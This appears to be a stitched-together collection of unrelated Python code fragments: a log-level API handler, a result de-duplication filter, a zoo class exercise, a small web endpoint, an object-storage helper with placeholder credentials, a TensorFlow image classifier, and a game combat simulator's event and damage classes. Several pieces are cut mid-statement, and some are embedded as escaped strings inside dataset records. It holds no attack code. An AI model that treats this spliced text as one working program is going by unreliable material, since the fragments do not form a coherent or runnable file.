else:\n try:\n syslog_level = ok_syslogs[log_level.lower()]\n except (KeyError, AttributeError):\n return web.json_response(\n status=400,\n data={\"message\": f\"invalid log level {log_level}\"})\n\n code, stdout, stderr = await log_control.set_syslog_level(syslog_level)\n if code != 0:\n msg = f'Could not reload config: {stdout} {stderr}'\n LOG.error(msg)\n return web.json_response(status=500, data={'message': msg})\n else:\n\n if log_level:\n result = f'Upstreaming log level changed to {log_level}'\n getattr(LOG, log_level.lower())(\n 
class DuplicateFilter(ResultFilter):
    """
    Filters search results and rejects ones already stored by an application.
    This is done by checking the link field of new results against a list of
    ones currently stored by the application. If found, they are rejected.

    Options:

    * order (int): defines when, in the pipeline, this filter will be executed

    * existingResults (list of str): urls already stored in the application -
      we want to avoid getting these again.
    """

    def __init__(self, order=0, existingResults=None):
        """Constructor for DuplicateFilter."""
        super(DuplicateFilter, self).__init__(order)
        self.info = "Filters search results and removes ones already stored by the application using this filter (link field used for this check)."
        # Bug fix: the original used a mutable default argument ([]),
        # shared across every instance created without the parameter.
        self.existingResults = existingResults if existingResults is not None else []

    def filter(self, results):
        """
        Yield only results whose 'link' is not already stored.

        Parameters:

        * results (iterable of dict-like results with a 'link' field)

        Returns:

        * generator of novel results
        """
        # O(1) set membership instead of the original O(n) scan per result.
        seen = set(self.existingResults)
        for result in results:
            if result['link'] in seen:
                print('Rejected result as already stored')
            else:
                yield result
nonoverlap.exterior.coords.xy\n\n v_list = []\n\n for i in range(len(u)):\n v_list.append([u[i], v[i]])\n\n return v_list","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"143344230","text":"class Zoo:\n __animals = 0\n\n def __init__(self, zoo_name):\n self.zoo_name = zoo_name\n self.mammals = []\n self.fishes = []\n self.birds = []\n\n def add_animal(self, species, name):\n if species == \"mammal\":\n self.mammals.append(name)\n elif species == \"fish\":\n self.fishes.append(name)\n elif species == \"bird\":\n self.birds.append(name)\n Zoo.__animals += 1\n\n def get_info(self, species):\n result = \"\"\n if species == \"mammal\":\n result += f\"Mammals in {self.zoo_name}: {', '.join(self.mammals)}\\n\"\n elif species == \"fish\":\n result += f\"Fishes in {self.zoo_name}: {', '.join(self.fishes)}\\n\"\n elif species == \"bird\":\n result += f\"Birds in {self.zoo_name}: {', '.join(self.birds)}\\n\"\n\n result += f\"Total animals: {Zoo.__animals}\"\n return result\n\n\nzoo_name = input()\nzoo = Zoo(zoo_name)\nnumber_of_animals = int(input())\nfor animals in range(number_of_animals):\n animals, specie = input().split()\n zoo.add_animal(animals, specie)\n\nspecies = input()\n\nprint(zoo.get_info(species))","sub_path":"classes_and_objects_lab/zoo.py","file_name":"zoo.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"151642116","text":"# -*- coding: utf-8 -*-\n# app.py\n\nimport responder\nimport datetime\n\napi = responder.API()\n\n@api.route(\"/now\")\nasync def now(req, resp):\n dt_now = datetime.datetime.now()\n resp.text= dt_now.isoformat()\n\nif __name__ == '__main__':\n 
api.run()\n\n","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"42920483","text":"#!/usr/bin/python\n\nfrom oss.oss_api import OssAPI\n\ndef get_oss_api():\n try:\n oss = OssAPI(host='host', \n access_id=\"accessid\", \n secret_access_key='secret_key')\n except:\n return None\n return oss\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"41965815","text":"from model import Model\nimport tensorflow as tf\n\nclass ModelAllConvMod(Model):\n def __init__(self, activation_func):\n super(ModelAllConvMod, self).__init__(\"allconvmod\", activation_func)\n with tf.device(\"/gpu:0\"):\n self.input = tf.placeholder(tf.float32, shape=[None,32,32,3])\n self.labels = tf.placeholder(tf.float32, shape=[None,10])\n self.dropout = tf.placeholder(tf.float32)\n\n # 3x3 layer 1\n W_conv1 = self.__weights([3,3,3,96])\n b_conv1 = self.__biases([96])\n h_conv1 = self.act_fn(tf.nn.conv2d(self.input, W_conv1, strides=[1,1,1,1], padding=\"SAME\") + b_conv1)\n\n # 3x3 layer 2\n W_conv2 = self.__weights([3,3,96,96])\n b_conv2 = self.__biases([96])\n h_conv2 = self.act_fn(tf.nn.conv2d(h_conv1, W_conv2, strides=[1,1,1,1], padding=\"SAME\") + b_conv2)\n\n # 3x3 downsample layer 3\n W_downsample3 = self.__weights([3,3,96,96])\n b_downsample3 = self.__biases([96])\n h_downsample3 = self.act_fn(tf.nn.conv2d(h_conv2, W_downsample3, strides=[1,2,2,1], padding=\"SAME\") + b_downsample3)\n\n # 3x3 layer 4\n W_conv4 = self.__weights([3,3,96,192])\n b_conv4 = self.__biases([192])\n h_conv4 = self.act_fn(tf.nn.conv2d(h_downsample3, W_conv4, strides=[1,1,1,1], padding=\"SAME\") + b_conv4)\n\n # 3x3 layer 5\n W_conv5 = self.__weights([3,3,192,192])\n b_conv5 = self.__biases([192])\n h_conv5 = self.act_fn(tf.nn.conv2d(h_conv4, 
W_conv5, strides=[1,1,1,1], padding=\"SAME\") + b_conv5)\n\n # 3x3 downsample layer 6\n W_downsample6 = self.__weights([3,3,192,192])\n b_downsample6 = self.__biases([192])\n h_downsample6 = self.act_fn(tf.nn.conv2d(h_conv5, W_downsample6, strides=[1,2,2,1], padding=\"SAME\") + b_downsample6)\n\n W_fc1 = self.__weights([8*8*192, 1024])\n b_fc1 = self.__biases([1024])\n h_conv_r3_flat = tf.reshape(h_downsample6, [-1, 8*8*192])\n h_fc1 = self.act_fn(tf.nn.xw_plus_b(h_conv_r3_flat, W_fc1, b_fc1))\n\n W_fc2 = self.__weights([1024, 512])\n b_fc2 = self.__biases([512])\n h_fc2 = self.act_fn(tf.nn.xw_plus_b(h_fc1, W_fc2, b_fc2))\n\n h_fc2_dropout = tf.nn.dropout(h_fc2, self.dropout)\n\n W_fc3 = self.__weights([512, 10])\n b_fc3 = self.__biases([10])\n self.raw_scores = tf.nn.xw_plus_b(h_fc2_dropout, W_fc3, b_fc3)\n self.probabilities = tf.nn.softmax(self.raw_scores)\n self.prediction = tf.argmax(self.probabilities, 1)\n\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(self.raw_scores, self.labels))\n self.train = tf.train.AdamOptimizer(1e-4).minimize(loss)\n\n self.accuracy = tf.reduce_mean(tf.cast(tf.equal(self.prediction, tf.argmax(self.labels, 1)), tf.float32))\n\n def train_model(self, session, images, labels):\n session.run(self.train, feed_dict={self.input: images, self.labels: labels, self.dropout: 0.75})\n\n def predict(self, session, images):\n return session.run(self.prediction, feed_dict={self.input: images, self.dropout: 1.0})\n\n def get_accuracy(self, session, images, labels):\n return session.run(self.accuracy, feed_dict={self.input: images, self.labels: labels, self.dropout: 1.0})\n\n def __weights(self, shape):\n return tf.Variable(tf.truncated_normal(shape, stddev=0.1))\n\n def __biases(self, shape):\n return tf.Variable(tf.constant(0.1, 
shape=shape))\n","sub_path":"model_allconv_mod.py","file_name":"model_allconv_mod.py","file_ext":"py","file_size_in_byte":3610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"610705567","text":"from abc import ABCMeta, abstractmethod\nfrom datetime import datetime, timedelta\nfrom math import ceil, floor\nfrom typing import List, Tuple\n\nimport numpy\n\nfrom simfantasy.common_math import divisor_per_level, get_base_stats_by_job, \\\n main_stat_per_level, sub_stat_per_level\nfrom simfantasy.enums import Attribute, Job, RefreshBehavior, Resource, Slot\nfrom simfantasy.simulator import Actor, Aura, Simulation, TickingAura\n\n\nclass Event(metaclass=ABCMeta):\n \"\"\"Emitted objects corresponding to in-game occurrences.\"\"\"\n\n def __init__(self, sim: Simulation):\n \"\"\"\n Create a new event.\n\n :param sim: The simulation that the event is fired within.\n \"\"\"\n self.sim = sim\n\n self.timestamp: datetime = None\n self.unscheduled = False\n\n def __lt__(self, other: 'Event') -> bool:\n \"\"\"\n Comparison for determining if one Event is less than another. Required for sorting the event heap. 
Returns\n\n :param other: The other event to compare to.\n :return: True if current event occurs before other.\n \"\"\"\n return self.timestamp < other.timestamp\n\n def __str__(self) -> str:\n \"\"\"String representation of the object.\"\"\"\n return '<{cls}>'.format(cls=self.__class__.__name__)\n\n @abstractmethod\n def execute(self) -> None:\n \"\"\"Handle the event appropriately when popped off the heap queue.\"\"\"\n\n\nclass CombatStartEvent(Event):\n def __init__(self, sim: Simulation):\n super().__init__(sim)\n\n self.sim.current_time = self.sim.start_time = datetime.now()\n\n def execute(self) -> None:\n for actor in self.sim.actors:\n self.sim.logger.debug('[%s] ^^ %s %s arises', self.sim.current_iteration, self.sim.relative_timestamp,\n actor)\n actor.arise()\n\n\nclass CombatEndEvent(Event):\n \"\"\"An event indicating that combat has ceased.\"\"\"\n\n def execute(self) -> None:\n \"\"\"Clear any remaining events in the heap.\"\"\"\n self.sim.events.clear()\n\n\nclass AuraEvent(Event, metaclass=ABCMeta):\n \"\"\"\n An event that deals with an \"aura\", i.e., a buff or debuff that can be applied to an\n :class:`~simfantasy.simulator.Actor`.\n \"\"\"\n\n def __init__(self, sim: Simulation, target: Actor, aura: Aura):\n \"\"\"\n Create a new event.\n\n :param sim: The simulation that the event is fired within.\n :param target: The :class:`~simfantasy.simulator.Actor` context in which to evaluate the aura.\n :param aura: The aura that will interact with the target.\n \"\"\"\n super().__init__(sim)\n\n self.target = target\n self.aura = aura\n\n def __str__(self) -> str:\n \"\"\"String representation of the object.\"\"\"\n return '<{cls} aura={aura} target={target}>'.format(\n cls=self.__class__.__name__,\n aura=self.aura.name,\n target=self.target.name\n )\n\n\nclass ApplyAuraEvent(AuraEvent):\n \"\"\"An event indicating that an aura should be added to an :class:`~simfantasy.simulator.Actor`.\"\"\"\n\n def execute(self) -> None:\n \"\"\"Add the aura to the 
target and fire any post-application hooks from the aura itself.\"\"\"\n self.aura.apply(self.target)\n\n self.target.statistics['auras'].append({\n 'iteration': self.sim.current_iteration,\n 'timestamp': self.sim.current_time,\n 'target': self.target.name,\n 'aura': self.aura.name,\n 'application': True,\n })\n\n\nclass ExpireAuraEvent(AuraEvent):\n \"\"\"An event indicating that an aura should be removed from an :class:`~simfantasy.simulator.Actor`.\"\"\"\n\n def execute(self) -> None:\n \"\"\"Remove the aura if still present on the target and fire any post-expiration hooks from the aura itself.\"\"\"\n self.aura.expire(self.target)\n self.aura.expiration_event = None\n\n self.target.statistics['auras'].append({\n 'iteration': self.sim.current_iteration,\n 'timestamp': self.sim.current_time,\n 'target': self.target.name,\n 'aura': self.aura.name,\n 'expiration': True,\n })\n\n\nclass ActorReadyEvent(Event):\n \"\"\"An event indicating that an :class:`~simfantasy.simulator.Actor` is ready to perform new actions.\"\"\"\n\n def __init__(self, sim: Simulation, actor: Actor):\n \"\"\"\n Create a new event.\n\n :param sim: The simulation that the event is fired within.\n :param actor: The :class:`~simfantasy.simulator.Actor` context, i.e, the one recovering from nonready state.\n \"\"\"\n super().__init__(sim)\n\n self.actor = actor\n\n def execute(self) -> None:\n decision_engine = self.actor.decide()\n\n for decision in decision_engine:\n if decision is not None:\n try:\n decision.perform()\n break\n except FailedActionAttemptError as e:\n if self.sim.log_action_attempts:\n self.sim.logger.warning('[%s] %s %s',\n self.sim.current_iteration, self.sim.relative_timestamp, e)\n\n continue\n else:\n break\n\n def __str__(self):\n \"\"\"String representation of the object.\"\"\"\n return '<{cls} actor={actor}>'.format(\n cls=self.__class__.__name__,\n actor=self.actor.name\n )\n\n\nclass RefreshAuraEvent(AuraEvent):\n def __init__(self, sim: Simulation, target: Actor, 
aura: Aura):\n super().__init__(sim, target, aura)\n\n self.remains = self.aura.expiration_event.timestamp - self.sim.current_time\n\n def execute(self) -> None:\n if self.aura.refresh_behavior is RefreshBehavior.RESET:\n delta = self.aura.duration\n elif self.aura.refresh_behavior is RefreshBehavior.EXTEND_TO_MAX:\n delta = max(self.aura.duration,\n self.sim.current_time - self.aura.expiration_event + self.aura.refresh_extension)\n else:\n delta = self.aura.duration\n\n self.aura.expire(self.target)\n self.aura.apply(self.target)\n\n self.sim.unschedule(self.aura.expiration_event)\n self.aura.expiration_event = ExpireAuraEvent(self.sim, self.target, self.aura)\n self.sim.schedule(self.aura.expiration_event, delta)\n\n self.target.statistics['auras'].append({\n 'iteration': self.sim.current_iteration,\n 'timestamp': self.sim.current_time,\n 'target': self.target.name,\n 'aura': self.aura.name,\n 'refresh': True,\n })\n\n def __str__(self) -> str:\n return '<{cls} aura={aura} target={target} behavior={behavior} remains={remains}>'.format(\n cls=self.__class__.__name__,\n aura=self.aura.name,\n target=self.target.name,\n behavior=self.aura.refresh_behavior,\n remains=format(self.remains.total_seconds(), '.3f')\n )\n\n\nclass ConsumeAuraEvent(AuraEvent):\n def __init__(self, sim: Simulation, target: Actor, aura: Aura):\n super().__init__(sim, target, aura)\n\n self.remains = self.aura.expiration_event.timestamp - self.sim.current_time\n\n def execute(self) -> None:\n self.aura.expire(self.target)\n self.sim.unschedule(self.aura.expiration_event)\n self.aura.expiration_event = None\n\n self.target.statistics['auras'].append({\n 'iteration': self.sim.current_iteration,\n 'timestamp': self.sim.current_time,\n 'target': self.target.name,\n 'aura': self.aura.name,\n 'consumption': True,\n })\n\n\nclass DamageEvent(Event):\n def __init__(self, sim: Simulation, source: Actor, target: Actor, action: 'Action', potency: int,\n trait_multipliers: List[float] = None, 
buff_multipliers: List[float] = None,\n guarantee_crit: bool = None):\n super().__init__(sim)\n\n if trait_multipliers is None:\n trait_multipliers = []\n\n if buff_multipliers is None:\n buff_multipliers = []\n\n self.source = source\n self.target = target\n self.action = action\n self.potency = potency\n self.trait_multipliers = trait_multipliers\n self.buff_multipliers = buff_multipliers\n\n self._damage = None\n\n self._is_critical_hit = guarantee_crit\n \"\"\"\n Deferred attribute. Set once unless cached value is invalidated. True if the ability was determined to be a\n critical hit.\n \"\"\"\n\n self._is_direct_hit = None\n \"\"\"\n Deferred attribute. Set once unless cached value is invalidated. True if the ability was determined to be a\n direct hit.\n \"\"\"\n\n def execute(self):\n self.source.statistics['damage'].append({\n 'iteration': self.sim.current_iteration,\n 'timestamp': self.sim.current_time,\n 'source': self.source.name,\n 'target': self.target.name,\n 'action': self.action.name,\n 'damage': self.damage,\n 'critical': self.is_critical_hit,\n 'direct': self.is_direct_hit\n })\n\n @property\n def critical_hit_chance(self) -> float:\n \"\"\"\n Calculate the critical hit probability.\n\n :return: A float in the range [0, 1].\n \"\"\"\n sub_stat = sub_stat_per_level[self.source.level]\n divisor = divisor_per_level[self.source.level]\n p_chr = floor(200 * (self.source.stats[Attribute.CRITICAL_HIT] - sub_stat) / divisor + 50) / 1000\n\n return p_chr\n\n @property\n def is_critical_hit(self) -> bool:\n \"\"\"\n Check for a cached value and set if being evaluated for the first time.\n\n :return: True if the ability is a critical hit.\n \"\"\"\n if self._is_critical_hit is None:\n if self.critical_hit_chance >= 100:\n self._is_critical_hit = True\n elif self.critical_hit_chance <= 0:\n self._is_critical_hit = False\n else:\n self._is_critical_hit = numpy.random.uniform() <= self.critical_hit_chance\n\n return self._is_critical_hit\n\n @property\n def 
direct_hit_chance(self):\n \"\"\"\n Calculate the direct hit probability.\n\n :return: A float in the range [0, 1].\n \"\"\"\n sub_stat = sub_stat_per_level[self.source.level]\n divisor = divisor_per_level[self.source.level]\n p_dhr = floor(550 * (self.source.stats[Attribute.DIRECT_HIT] - sub_stat) / divisor) / 1000\n\n return p_dhr\n\n @property\n def is_direct_hit(self):\n \"\"\"\n Check for a cached value and set if being evaluated for the first time.\n\n :return: True if the ability is a direct hit.\n \"\"\"\n if self._is_direct_hit is None:\n if self.direct_hit_chance >= 100:\n self._is_direct_hit = True\n elif self.direct_hit_chance <= 0:\n self._is_direct_hit = False\n else:\n self._is_direct_hit = numpy.random.uniform() <= self.direct_hit_chance\n\n return self._is_direct_hit\n\n @property\n def damage(self) -> int:\n \"\"\"\n Calculate the damage dealt directly to the target by the ability. Accounts for criticals, directs, and\n randomization.\n\n :return: The damage inflicted as an integer value.\n \"\"\"\n if self._damage is not None:\n return self._damage\n\n base_stats = get_base_stats_by_job(self.source.job)\n\n if self.action.powered_by is Attribute.ATTACK_POWER:\n if self.source.job in [Job.BARD, Job.MACHINIST, Job.NINJA]:\n job_attribute_modifier = base_stats[Attribute.DEXTERITY]\n attack_rating = self.source.stats[Attribute.DEXTERITY]\n else:\n job_attribute_modifier = base_stats[Attribute.STRENGTH]\n attack_rating = self.source.stats[Attribute.STRENGTH]\n\n weapon_damage = self.source.gear[Slot.WEAPON].physical_damage\n elif self.action.powered_by is Attribute.ATTACK_MAGIC_POTENCY:\n if self.source.job in [Job.ASTROLOGIAN, Job.SCHOLAR, Job.WHITE_MAGE]:\n job_attribute_modifier = base_stats[Attribute.MIND]\n attack_rating = self.source.stats[Attribute.MIND]\n else:\n job_attribute_modifier = base_stats[Attribute.INTELLIGENCE]\n attack_rating = self.source.stats[Attribute.INTELLIGENCE]\n\n weapon_damage = 
self.source.gear[Slot.WEAPON].magic_damage\n elif self.action.powered_by is Attribute.HEALING_MAGIC_POTENCY:\n job_attribute_modifier = base_stats[Attribute.MIND]\n weapon_damage = self.source.gear[Slot.WEAPON].magic_damage\n attack_rating = self.source.stats[Attribute.MIND]\n else:\n raise Exception('Action affected by unexpected attribute.')\n\n main_stat = main_stat_per_level[self.source.level]\n sub_stat = sub_stat_per_level[self.source.level]\n divisor = divisor_per_level[self.source.level]\n\n f_ptc = self.potency / 100\n f_wd = floor((main_stat * job_attribute_modifier / 1000) + weapon_damage)\n f_atk = floor((125 * (attack_rating - 292) / 292) + 100) / 100\n f_det = floor(130 * (self.source.stats[Attribute.DETERMINATION] - main_stat) / divisor + 1000) / 1000\n f_tnc = floor(100 * (self.source.stats[Attribute.TENACITY] - sub_stat) / divisor + 1000) / 1000\n f_chr = floor(200 * (self.source.stats[Attribute.CRITICAL_HIT] - sub_stat) / divisor + 1400) / 1000\n\n damage_randomization = numpy.random.uniform(0.95, 1.05)\n\n damage = f_ptc * f_wd * f_atk * f_det * f_tnc\n\n for m in self.trait_multipliers:\n damage *= m\n\n damage = floor(damage)\n damage = floor(damage * (f_chr if self.is_critical_hit else 1))\n damage = floor(damage * (1.25 if self.is_direct_hit else 1))\n damage = floor(damage * damage_randomization)\n\n for m in self.buff_multipliers:\n damage = floor(damage * m)\n\n self._damage = int(damage)\n\n return self._damage\n\n def __str__(self) -> str:\n \"\"\"String representation of the object.\"\"\"\n return '<{cls} source={source} target={target} action={action} crit={crit} direct={direct} damage={damage} traits={traits} buffs={buffs}>'.format(\n cls=self.__class__.__name__,\n source=self.source.name,\n target=self.target.name,\n action=self.action.name,\n crit=self.is_critical_hit,\n direct=self.is_direct_hit,\n damage=self.damage,\n traits=self.trait_multipliers,\n buffs=self.buff_multipliers,\n )\n\n\nclass DotTickEvent(DamageEvent):\n def 
__init__(self, sim: Simulation, source: Actor, target: Actor, action: 'Action', potency: int, aura: TickingAura,\n ticks_remain: int = None, trait_multipliers: List[float] = None, buff_multipliers: List[float] = None):\n super().__init__(sim, source, target, action, potency, trait_multipliers, buff_multipliers)\n\n self.aura = aura\n self.action = action\n\n if ticks_remain is None:\n ticks_remain = self.aura.ticks\n\n self.ticks_remain = ticks_remain\n\n def execute(self) -> None:\n self.source.statistics['damage'].append({\n 'iteration': self.sim.current_iteration,\n 'timestamp': self.sim.current_time,\n 'source': self.source.name,\n 'target': self.target.name,\n 'action': self.action.name,\n 'damage': self.damage,\n 'critical': self.is_critical_hit,\n 'direct': self.is_direct_hit,\n 'dot': True,\n })\n\n if self.ticks_remain > 0:\n tick_event = self.create_tick_event(self.sim, self.source, self.target, self.action, self.potency,\n self.aura, self.ticks_remain - 1, self.trait_multipliers,\n self.buff_multipliers)\n\n self.aura.tick_event = tick_event\n self.sim.schedule(tick_event, timedelta(seconds=3))\n\n @classmethod\n def create_tick_event(cls, *args, **kwargs):\n return cls(*args, **kwargs)\n\n @property\n def damage(self) -> int:\n if self._damage is not None:\n return self._damage\n\n base_stats = get_base_stats_by_job(self.source.job)\n\n if self.action.powered_by is Attribute.ATTACK_POWER:\n if self.source.job in [Job.BARD, Job.MACHINIST, Job.NINJA]:\n job_attribute_modifier = base_stats[Attribute.DEXTERITY]\n attack_rating = self.source.stats[Attribute.DEXTERITY]\n else:\n job_attribute_modifier = base_stats[Attribute.STRENGTH]\n attack_rating = self.source.stats[Attribute.STRENGTH]\n\n weapon_damage = self.source.gear[Slot.WEAPON].physical_damage\n elif self.action.powered_by is Attribute.ATTACK_MAGIC_POTENCY:\n if self.source.job in [Job.ASTROLOGIAN, Job.SCHOLAR, Job.WHITE_MAGE]:\n job_attribute_modifier = base_stats[Attribute.MIND]\n attack_rating = 
self.source.stats[Attribute.MIND]\n else:\n job_attribute_modifier = base_stats[Attribute.INTELLIGENCE]\n attack_rating = self.source.stats[Attribute.INTELLIGENCE]\n\n weapon_damage = self.source.gear[Slot.WEAPON].magic_damage\n elif self.action.powered_by is Attribute.HEALING_MAGIC_POTENCY:\n job_attribute_modifier = base_stats[Attribute.MIND]\n weapon_damage = self.source.gear[Slot.WEAPON].magic_damage\n attack_rating = self.source.stats[Attribute.MIND]\n else:\n raise Exception('Action affected by unexpected attribute.')\n\n main_stat = main_stat_per_level[self.source.level]\n sub_stat = sub_stat_per_level[self.source.level]\n divisor = divisor_per_level[self.source.level]\n\n f_ptc = self.potency / 100\n f_wd = floor((main_stat * job_attribute_modifier / 1000) + weapon_damage)\n f_atk = floor((125 * (attack_rating - 292) / 292) + 100) / 100\n f_det = floor(130 * (self.source.stats[Attribute.DETERMINATION] - main_stat) / divisor + 1000) / 1000\n f_tnc = floor(100 * (self.source.stats[Attribute.TENACITY] - sub_stat) / divisor + 1000) / 1000\n f_ss = floor(130 * (self.source.stats[self.action.hastened_by] - sub_stat) / divisor + 1000) / 1000\n f_chr = floor(200 * (self.source.stats[Attribute.CRITICAL_HIT] - sub_stat) / divisor + 1400) / 1000\n\n damage_randomization = numpy.random.uniform(0.95, 1.05)\n\n damage = f_ptc * f_wd * f_atk * f_det * f_tnc\n\n for m in self.trait_multipliers:\n damage *= m\n\n damage = floor(damage)\n damage = floor(damage * f_ss)\n damage = floor(damage * (f_chr if self.is_critical_hit else 1))\n damage = floor(damage * (1.25 if self.is_direct_hit else 1))\n damage = floor(damage * damage_randomization)\n\n for m in self.buff_multipliers:\n damage = floor(damage * m)\n\n self._damage = int(damage)\n\n return self._damage\n\n def __str__(self):\n return '<{cls} source={source} target={target} action={action} crit={crit} direct={direct} damage={damage} ticks_remain={ticks_remain}>'.format(\n cls=self.__class__.__name__,\n 
source=self.source.name,\n target=self.target.name,\n action=self.action.name,\n crit=self.is_critical_hit,\n direct=self.is_direct_hit,\n damage=self.damage,\n ticks_remain=self.ticks_remain,\n )\n\n\nclass Action:\n animation = timedelta(seconds=0.75)\n base_cast_time: timedelta = timedelta()\n base_recast_time: timedelta = timedelta(seconds=2.5)\n cost: Tuple[Resource, int] = None\n guarantee_crit: bool = None\n hastened_by: Attribute = None\n is_off_gcd: bool = False\n potency: int = 0\n powered_by: Attribute = None\n shares_recast_with: 'Action' = None\n\n def __init__(self, sim: Simulation, source: Actor):\n self.sim = sim\n self.source = source\n self.can_recast_at = None\n\n @property\n def name(self):\n return self.__class__.__name__\n\n def perform(self):\n if self.on_cooldown:\n raise ActionOnCooldownError(self.sim, self.source, self)\n\n if self.animation > timedelta() and \\\n self.source.animation_unlock_at is not None and \\\n self.source.animation_unlock_at > self.sim.current_time:\n raise ActorAnimationLockedError(self.sim, self.source, self)\n\n if not self.is_off_gcd and \\\n self.source.gcd_unlock_at is not None and \\\n self.source.gcd_unlock_at > self.sim.current_time:\n raise ActorGCDLockedError(self.sim, self.source, self)\n\n self.sim.logger.debug('[%s] @@ %s %s uses %s', self.sim.current_iteration, self.sim.relative_timestamp,\n self.source, self)\n\n self.source.animation_unlock_at = self.sim.current_time + self.animation\n self.sim.schedule(ActorReadyEvent(self.sim, self.source), max(self.animation, self.cast_time))\n\n if not self.is_off_gcd:\n self.source.gcd_unlock_at = self.sim.current_time + self.gcd\n self.sim.schedule(ActorReadyEvent(self.sim, self.source), max(self.cast_time, self.gcd))\n\n self.set_recast_at(self.recast_time)\n\n self.schedule_resource_consumption()\n\n self.schedule_damage_event()\n\n def schedule_resource_consumption(self):\n if self.cost is not None:\n resource, amount = self.cost\n 
self.sim.schedule(ResourceEvent(self.sim, self.source, resource, -amount))\n\n def schedule_damage_event(self):\n if self.potency > 0:\n self.sim.schedule(\n DamageEvent(self.sim, self.source, self.source.target, self, self.potency, self._trait_multipliers,\n self._buff_multipliers, self.guarantee_crit), self.cast_time)\n\n def set_recast_at(self, delta: timedelta):\n recast_at = self.sim.current_time + delta\n\n self.can_recast_at = recast_at\n\n if self.shares_recast_with is not None:\n self.shares_recast_with.can_recast_at = recast_at\n\n def schedule_aura_events(self, target: Actor, aura: Aura):\n if aura.expiration_event is not None:\n self.sim.schedule(RefreshAuraEvent(self.sim, target, aura))\n self.sim.unschedule(aura.expiration_event)\n else:\n aura.application_event = ApplyAuraEvent(self.sim, target, aura)\n aura.expiration_event = ExpireAuraEvent(self.sim, target, aura)\n\n self.sim.schedule(aura.application_event)\n self.sim.schedule(aura.expiration_event, aura.duration)\n\n def schedule_dot(self, dot: TickingAura):\n self.schedule_aura_events(self.source.target, dot)\n\n if dot.tick_event is not None and dot.tick_event.timestamp > self.sim.current_time:\n self.sim.unschedule(dot.tick_event)\n\n tick_event = DotTickEvent(self.sim, self.source, self.source.target, self, dot.potency, dot)\n\n dot.tick_event = tick_event\n\n self.sim.schedule(tick_event, timedelta(seconds=3))\n\n @property\n def on_cooldown(self):\n return self.can_recast_at is not None and self.can_recast_at > self.sim.current_time\n\n @property\n def cooldown_remains(self):\n return timedelta() if not self.on_cooldown else self.can_recast_at - self.sim.current_time\n\n @property\n def cast_time(self):\n return self._speed(self.base_cast_time)\n\n @property\n def recast_time(self):\n if self.base_recast_time > timedelta(seconds=2.5):\n return self._speed(self.base_recast_time)\n\n return self.gcd\n\n @property\n def gcd(self):\n return self._speed(timedelta(seconds=2.5))\n\n @property\n 
def type_ii_speed_mod(self):\n return 0\n\n def _speed(self, action_delay: timedelta) -> timedelta:\n speed = self.source.stats[self.hastened_by]\n\n sub_stat = sub_stat_per_level[self.source.level]\n divisor = divisor_per_level[self.source.level]\n\n # TODO Implement all these buffs.\n\n rapid_fire = False\n\n if rapid_fire:\n return timedelta(seconds=1.5)\n\n arrow_mod = 0\n haste_mod = 0\n fey_wind_mod = 0\n\n riddle_of_fire = False\n riddle_of_fire_mod = 115 if riddle_of_fire else 100\n\n astral_umbral = False\n astral_umbral_mod = 50 if astral_umbral else 100\n\n type_1_mod = 0\n type_2_mod = self.type_ii_speed_mod\n\n gcd_m = floor((1000 - floor(130 * (speed - sub_stat) / divisor)) * action_delay.total_seconds())\n\n gcd_c_a = floor(\n floor(floor((100 - arrow_mod) * (100 - type_1_mod) / 100) * (100 - haste_mod) / 100) - fey_wind_mod\n )\n gcd_c_b = (type_2_mod - 100) / -100\n gcd_c = floor(\n floor(floor(ceil(gcd_c_a * gcd_c_b) * gcd_m / 100) * riddle_of_fire_mod / 1000) * astral_umbral_mod / 100\n )\n\n gcd = gcd_c / 100\n\n return timedelta(seconds=gcd)\n\n @property\n def _buff_multipliers(self) -> List[float]:\n return [1.0]\n\n @property\n def _trait_multipliers(self) -> List[float]:\n return [1.0]\n\n def __str__(self):\n return '<{cls}>'.format(cls=self.__class__.__name__)\n\n\nclass ResourceEvent(Event):\n def __init__(self, sim: Simulation, target: Actor, resource: Resource, amount: int):\n super().__init__(sim)\n\n self.target = target\n self.resource = resource\n self.amount = amount\n\n def execute(self) -> None:\n current, maximum = self.target.resources[self.resource]\n\n final_resource = max(min(current + self.amount, maximum), 0)\n\n self.target.resources[self.resource] = (final_resource, maximum)\n self.target.statistics['resources'].append({\n 'iteration': self.sim.current_iteration,\n 'timestamp': self.sim.current_time,\n 'target': self.target.name,\n 'resource': self.resource,\n 'amount': self.amount,\n 'level': final_resource,\n })\n\n 
def __str__(self):\n return '<{cls} target={target} resource={resource} amount={amount}>'.format(\n cls=self.__class__.__name__,\n target=self.target.name,\n resource=self.resource,\n amount=self.amount,\n )\n\n\nclass ServerTickEvent(Event):\n def execute(self) -> None:\n super().execute()\n\n for actor in self.sim.actors:\n current_mp, max_mp = actor.resources[Resource.MP]\n current_tp, max_tp = actor.resources[Resource.TP]\n\n if current_mp < max_mp:\n mp_tick = int(floor(0.02 * max_mp))\n\n self.sim.schedule(ResourceEvent(self.sim, actor, Resource.MP, mp_tick)) # TODO Tick rate?\n\n if current_tp < max_tp:\n self.sim.schedule(ResourceEvent(self.sim, actor, Resource.TP, 60)) # TODO Tick rate?\n\n\nclass ApplyAuraStackEvent(AuraEvent):\n def execute(self) -> None:\n if self.aura.stacks < self.aura.max_stacks:\n self.aura.stacks += 1\n\n\nclass AutoAttackAction(Action):\n animation = timedelta()\n is_off_gcd = True\n hastened_by = Attribute.SKILL_SPEED\n\n # TODO Would like to avoid having to duplicate so much code here.\n def perform(self):\n super().perform()\n\n self.sim.schedule(ActorReadyEvent(self.sim, self.source), self.recast_time)\n\n @property\n def base_recast_time(self):\n return timedelta(seconds=self.source.gear[Slot.WEAPON].delay)\n\n def create_damage_event(self):\n self.sim.schedule(\n AutoAttackEvent(self.sim, self.source, self.source.target, self, 